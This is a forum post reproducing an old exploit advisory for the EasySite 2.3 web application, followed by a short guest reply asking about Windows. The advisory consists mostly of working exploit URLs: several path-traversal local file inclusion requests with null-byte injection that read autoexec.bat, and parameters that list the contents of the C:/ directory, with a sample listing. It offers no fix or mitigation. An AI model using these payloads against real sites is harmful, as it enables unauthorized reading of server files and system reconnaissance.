Jump to content
SirGod

EasySite 2.3 Multiple Remote Vulnerabilities

Recommended Posts

Posted
####################################################################
[+] EasySite v2.3 Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
####################################################################

[+] Local File Inclusion

[url]http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00[/url]
[url]http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00[/url]
[url]http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00[/url]
[url]http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00[/url]
[url]http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00[/url]
[url]http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00[/url]
[url]http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00[/url]

And many others...

This will open autoexec.bat

[+] Arbitrary View Folder Contents

You can view the folder contents and the content of files view via LFI.

[url]http://localhost/www/index.php?module=../../../[/url]

[url]http://localhost/inc/vmenu.php?module=../../../[/url]

This will open C:/ directory and will show all the files from C:/ .

Example :

* BOOTSECT.BAK
* BcBtRmv.log
* IO.SYS
* MSDOS.SYS
* autoexec.bat
* bootmgr
* config.sys
* grldr
* hiberfil.sys
* pagefile.sys

####################################################################

# milw0rm.com [2008-08-21]

Guest Kenpachi
Posted

tot tineam sa te intreb care e faza cu autoexec.bat , astea is softuri pt win ? sau le testezi tu pe win si d'aia ?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...